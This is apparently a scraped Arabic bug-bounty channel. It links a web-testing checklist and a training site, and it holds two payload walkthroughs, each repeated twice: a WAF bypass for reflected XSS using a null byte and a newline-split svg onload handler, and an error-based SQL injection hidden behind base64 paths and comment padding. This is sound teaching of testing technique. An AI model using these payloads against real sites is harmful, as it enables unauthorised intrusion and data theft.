زي ما الأخ داوود حط كتاب على Tips and tricks قبل ساعة ده كتاب ثاني خفيف وظريف ممكن يساعدكم في عملية التدقيق على الثغرات اللي ممكن تبحث عنها قبل متزهق من بروجرام معين :
https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
وحظ موفق للجميع Happy hacking ✌️
https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
وحظ موفق للجميع Happy hacking ✌️
GitHub
HowToHunt/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf at master · KathanP19/HowToHunt
Collection of methodology and test case for various web vulnerabilities. - KathanP19/HowToHunt
Xss
Hello Waf
site.com/cart/11?input=admin reflected
site.com/cart/11?input=admin' reflected admin'
site.com/cart/11?input=admin'" reflected admin'"
site.com/cart/11?input=admin'"> reflected admin'">
site.com/cart/11?input=admin'">< Access Denied 403
site.com/cart/11?input=admin>< reflected
site.com/cart/11?input=admin'>< reflected
site.com/cart/11?input=admin'">< Access Denied 403
site.com/cart/11?input=admin"<> reflected
site.com/cart/11?input=admin"<svg Access Denied 403
site.com/cart/11?input=admin"<1 Access Denied 403
hey waf
site.com/cart/11?input=leet"%00<svg reflected bypassed
site.com/cart/11?input?leet"%00<svg/OnlOad= Access Denied 403
site.com/cart/11?input?leet"%00<svg/OnlOads= event handler :(
All are blocked
site.com/cart/11?input?leet"%00<svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3d Reflected Bypassed
site.com/cart/11?input?leet"%00<Svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3dconfirm(1)
Access Denied 403
Final Payload
site.com/cart/11?input?leet"%00<Svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3dconfirm%601%60>
Bounty $$$+Extra for bypassing waf
Hello Waf
site.com/cart/11?input=admin reflected
site.com/cart/11?input=admin' reflected admin'
site.com/cart/11?input=admin'" reflected admin'"
site.com/cart/11?input=admin'"> reflected admin'">
site.com/cart/11?input=admin'">< Access Denied 403
site.com/cart/11?input=admin>< reflected
site.com/cart/11?input=admin'>< reflected
site.com/cart/11?input=admin'">< Access Denied 403
site.com/cart/11?input=admin"<> reflected
site.com/cart/11?input=admin"<svg Access Denied 403
site.com/cart/11?input=admin"<1 Access Denied 403
hey waf
site.com/cart/11?input=leet"%00<svg reflected bypassed
site.com/cart/11?input?leet"%00<svg/OnlOad= Access Denied 403
site.com/cart/11?input?leet"%00<svg/OnlOads= event handler :(
All are blocked
site.com/cart/11?input?leet"%00<svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3d Reflected Bypassed
site.com/cart/11?input?leet"%00<Svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3dconfirm(1)
Access Denied 403
Final Payload
site.com/cart/11?input?leet"%00<Svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3dconfirm%601%60>
Bounty $$$+Extra for bypassing waf
Hey Blind Sql ?
Hey Error Based?
1. site.com/search/test 200
2.site.com/search/test' Error
Something has gone wrong and this URL cannot be processed at this time.
3. site.com/search/test--+ Disallowed Key Characters in URL.
4. site.com/search/dGVzdA== test encoded base64
result. Your search for test returned 183 results
5. site.com/search/dGVzdCc= test' base64
result. Your search for test not found
6. https://www.site.com/search/dGVzdCctLSs= test'--+ base64
result. Your search for test returned 183 results
7. test' order by 1--+ not found
8. test'--+ result found
9. test' and extractvalue(0x0a,concat(0x0a,(select version())))--+ 403
10. test' and extractvalue/**_**/(0x0a,concat/**_**/(0x0a,(select/**_**/version())))--+ 403
11. test' and extractvalue%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0a(0x0a,concat%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0a(0x0a,(select%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0aversion())))--+
hey version Found
bounty $$$$$
Hey Error Based?
1. site.com/search/test 200
2.site.com/search/test' Error
Something has gone wrong and this URL cannot be processed at this time.
3. site.com/search/test--+ Disallowed Key Characters in URL.
4. site.com/search/dGVzdA== test encoded base64
result. Your search for test returned 183 results
5. site.com/search/dGVzdCc= test' base64
result. Your search for test not found
6. https://www.site.com/search/dGVzdCctLSs= test'--+ base64
result. Your search for test returned 183 results
7. test' order by 1--+ not found
8. test'--+ result found
9. test' and extractvalue(0x0a,concat(0x0a,(select version())))--+ 403
10. test' and extractvalue/**_**/(0x0a,concat/**_**/(0x0a,(select/**_**/version())))--+ 403
11. test' and extractvalue%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0a(0x0a,concat%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0a(0x0a,(select%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0aversion())))--+
hey version Found
bounty $$$$$
❤1
الwebsite دي https://www.bugbountyhunter.com عملت حاجه جميله جدا هي انهم نزلوا كل الريبورتات الpublicly disclosed على hackerone مترتبه بنوع الثغرات فكل program فدلوقتي تقدر تتعلم انواع الثغرات بشكل افضل و هيساعدك تفهم الprogram اللي بتشتغل عليه بشكل احسن
Bugbountyhunter
Become a bug bounty hunter - Learn about web application vulnerabilities and how to find them on bug bounty programs | BugBountyHunter.com
BugBountyHunter is a training platform created by bug bounty hunter zseano designed to help you learn all about web application vulnerabilities and how get involved in bug bounties. Begin participating from the comfort of your own home.
Forwarded from Hacker Vision (DARK ANONYMOUS)